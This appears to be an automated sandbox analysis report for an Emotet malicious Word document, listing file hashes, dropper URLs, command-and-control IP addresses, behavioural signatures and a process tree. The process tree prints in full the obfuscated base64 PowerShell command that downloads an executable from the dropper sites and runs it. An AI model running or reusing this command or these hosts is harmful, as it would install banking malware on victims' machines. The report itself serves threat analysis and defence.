Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Analysis

  • max time kernel
    57s
  • max time network
    62s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    18-07-2020 00:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    07e5681a62cd85f3497fa483b902a97a35682b5c81b633d9fe594c5be67a9d3a.doc

  • Size

    196KB

  • MD5

    0b6d356e5347e1f0551fb54f77b7d838

  • SHA1

    583efc48b67a1dd7618b974d4e476d6a4c27479f

  • SHA256

    07e5681a62cd85f3497fa483b902a97a35682b5c81b633d9fe594c5be67a9d3a

  • SHA512

    da6a02b69af7a4ff9e16f3244fa852fe5b19958386ee1f74ed897d2d703b7ce86ddab44300bb449999c42e4825bac2337fd33eb6c67c69ee9a4dc9cc93ad3404

Score
10/10
discoverytrojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://aliyousefpoor.com/wp-admin/Gkt8B41139/
exe.dropper

http://www.szhealthshield.com/websiteguide/k82i/
exe.dropper

https://digitalcon7.net/wp-snapshots/0Wn/
exe.dropper

https://exam.ylsbmeirong.com/data/tjEyH973/
exe.dropper

http://abatiy.com/yaa/po0395/

Extracted

Family

emotet

C2

177.144.135.2:80

104.247.221.104:443

201.213.32.59:80

190.147.137.153:443

178.79.163.131:8080

190.17.195.202:80

212.71.237.140:8080

68.183.190.199:8080

12.162.84.2:8080

186.250.52.226:8080

181.129.96.162:8080

185.94.252.12:80

77.55.211.77:8080

177.72.13.80:80

70.32.115.157:8080

114.109.179.60:80

68.183.170.114:8080

5.196.35.138:7080

87.106.46.107:8080

190.163.1.31:8080
rsa_pubkey.plain

Signatures

  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Modifies registry class 280 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\07e5681a62cd85f3497fa483b902a97a35682b5c81b633d9fe594c5be67a9d3a.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    • Modifies registry class
    PID:1080
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABoAGEAdQBoAHEAdQBhAGMAdgBvAGUAbQBuAGkAbwB2AGsAbwB1AHoAPQAnAGQAYQB3AHEAdQBpAG8AYgBkAGEAdQBjAGgAdgBpAGUAYgBxAHUAZQBhAGQAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAEMAVQBSAEkAdABZAGAAUABSAGAATwBgAFQATwBDAG8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAHcAaQBlAHAAeABlAGkAYwB3AGUAYQBnAGMAbwBvAGcAYgBpAGEAbABqAG8AcQB1ACAAPQAgACcAOQAzADMAJwA7ACQAdABlAGEAZwBzAGUAaQB2AG4AaQBvAHgAagBhAG8AcQB1AD0AJwBsAGUAbwBrAGcAbwB1AGoAagBlAGUAYgBiAGEAZQBoACcAOwAkAHAAdQB1AHIAdABoAGUAcwB5AGUAYQB5AHMAaQBuAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGkAZQBwAHgAZQBpAGMAdwBlAGEAZwBjAG8AbwBnAGIAaQBhAGwAagBvAHEAdQArACcALgBlAHgAZQAnADsAJABjAGEAdQBtAHQAbwBlAHEAdQBrAGEAYwBjAGgAaQBvAGgAZwBlAGUAcwBiAHUAbAA9ACcAZgBvAGkAcgBmAGEAbwB6AGMAbwB6AGgAaQBhAGwAcQB1AGEAdQBzACcAOwAkAHQAaABhAGkAdABrAGEAZQByAHoAdQB1AGYAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQBUAC4AdwBlAEIAQwBMAEkARQBOAFQAOwAkAHMAZQBhAG0AcQB1AG8AdQB3AGMAaABlAHUAYwBoAHgAYQB1AGcAegBlAGkAagA9ACcAaAB0AHQAcABzADoALwAvAGEAbABpAHkAbwB1AHMAZQBmAHAAbwBvAHIALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEcAawB0ADgAQgA0ADEAMQAzADkALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAHoAaABlAGEAbAB0AGgAcwBoAGkAZQBsAGQALgBjAG8AbQAvAHcAZQBiAHMAaQB0AGUAZwB1AGkAZABlAC8AawA4ADIAaQAvACoAaAB0AHQAcABzADoALwAvAGQAaQBnAGkAdABhAGwAYwBvAG4ANwAuAG4AZQB0AC8AdwBwAC0AcwBuAGEAcABzAGgAbwB0AHMALwAwAFcAbgAvACoAaAB0AHQAcABzADoALwAvAGUAeABhAG0ALgB5AGwAcwBiAG0AZQBpAHIAbwBuAGcALgBjAG8AbQAvAGQAYQB0AGEALwB0AGoARQB5AEgAOQA3ADMALwAqAGgAdAB0AHAAOgAvAC8AYQBiAGEAdABpAHkALgBjAG8AbQAvAHkAYQBhAC8AcABvADAAMwA5ADUALwAnAC4AIgBTAGAAcABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAGQAYQBvAGYAcgBhAG8AdABwAGEAbwB0AHYAdQBhAHcAPQAnAHcAZQBhAHoAdABlAHUAZABjAGUAaQBnAGMAbwBlAHcAdABoAGUAaQB4AG0AZQB1AHcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGwAbwBpAG0AeABlAG8AbgBtAG8AYQB3ACAAaQBuACAAJABzAGUAYQBtAHEAdQBvAHUAdwBjAGgAZQB1AGMAaAB4AGEAdQBnAHoAZQBpAGoAKQB7AHQAcgB5AHsAJAB0AGgAYQBpAHQAawBhAGUAcgB6AHUAdQBmAC4AIgBEAGAATwB3AG4ATABgAG8AYQBkAGYASQBMAEUAIgAoACQAbABvAGkAbQB4AGUAbwBuAG0AbwBhAHcALAAgACQAcAB1AHUAcgB0AGgAZQBzAHkAZQBhAHkAcwBpAG4AKQA7ACQAcwBvAGkAbgB3AGEAegBtAGUAaQBrAGgAZQBvAHYAdABoAGEAdQBqAGYAbwBpAHgAPQAnAG0AYQBlAHIAZABvAHUAZwBsAG8AaQBtAGcAbwBhAHQAaABjAHUAdQBjACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAcAB1AHUAcgB0AGgAZQBzAHkAZQBhAHkAcwBpAG4AKQAuACIATABgAEUAbgBnAGAAVABIACIAIAAtAGcAZQAgADMANwA2ADMAOQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBgAFIAZQBhAHQARQAiACgAJABwAHUAdQByAHQAaABlAHMAeQBlAGEAeQBzAGkAbgApADsAJABiAGEAZQB3AD0AJwB5AG8AdAB3AGEAaQB2AG0AbwBvAGsAcwBhAG8AYwBoAHQAbwBpAGoAJwA7AGIAcgBlAGEAawA7ACQAYwBpAG8AcwBwAGkAbwBiAHEAdQBhAG8AcwBsAGUAaQB3AD0AJwBqAGEAZQBjAGgAZgB1AHUAYwBoAGoAaQBlAHkAegBhAGUAeQBwAGUAbwB6AHQAaABvAGkAaAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AGUAZQBjAGwAaQBlAGcAPQAnAHgAdQBqACcA
    1⤵
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Process spawned unexpected child process
    PID:1648
  • C:\Users\Admin\933.exe
    C:\Users\Admin\933.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1364
    • C:\Windows\SysWOW64\cmstp\api-ms-win-service-winsvc-l1-1-0.exe
      "C:\Windows\SysWOW64\cmstp\api-ms-win-service-winsvc-l1-1-0.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:1640

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1080-0-0x0000000006230000-0x0000000006330000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/1080-2-0x0000000008B00000-0x0000000008B04000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1080-3-0x0000000006F00000-0x0000000007100000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1080-4-0x000000000ADC0000-0x000000000ADC4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1080-5-0x000000000BE40000-0x000000000BE44000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1080-6-0x0000000006F00000-0x0000000007100000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1364-9-0x00000000002B0000-0x00000000002BC000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1640-12-0x0000000000270000-0x000000000027C000-memory.dmp

    Filesize

    48KB

    Download